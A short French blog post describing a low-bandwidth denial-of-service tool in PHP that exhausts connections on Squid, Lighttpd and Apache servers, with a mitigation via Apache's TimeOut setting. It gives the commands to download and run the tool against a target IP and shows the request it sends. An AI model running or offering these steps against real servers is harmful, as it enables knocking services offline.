Multiple Http Server Low Bandwidth Denial of Service

Multiple Http Server Low Bandwidth Denial of Service

Un outil de Déni de Service (DOS) vient de voir le jour sur les réseaux underground.
En php a pour fonction principale d’épuiser le nombre de connexions disponibles.
Il peut être exécuté depuis une machine distante afin de faire tomber un serveur.

Voici un exemple d’utilisation :

cd /tmp
wget https://fabblog.fabaur.fr/multiple-http-server-low-bandwidth-dos/multiple-http-server-low-bandwidth-dos.phps
mv multiple-http-server-low-bandwidth-dos.phps exploit.php
php exploit.php 20000 192.168.100.10

Les arguments sont le nombre de connexions à utiliser et l’adresse IP du serveur.
Le script php ouvre en fait une connexion normale de la façon suivante :

GET / HTTP/1.1rn
Host: hostrn
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Content-Length: 42\r\n

 

Les serveurs web Squid, Lighttpd, Apache 1.x et 2.x sont concernés.
La bonne nouvelle concerne pour une fois les serveurs Microsoft IIS 6.0 ou 7.0 qui ne sont pas affectés.

La seule solution trouvée pour contrer cette attaque est de modifier la configuration d’Apache (httpd.conf)
et de diminuer la valeur de l’option TimeOut, qui est positionnée à 300 par défaut :

TimeOut 5

Mais ce changement de valeur peut avoir des effets de bord sur le serveur, notamment pour les connexions lentes.
Le mieux est donc d’attendre avec patience les mises à jour de sécurité.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.

* Copy This Password *

* Type Or Paste Password Here *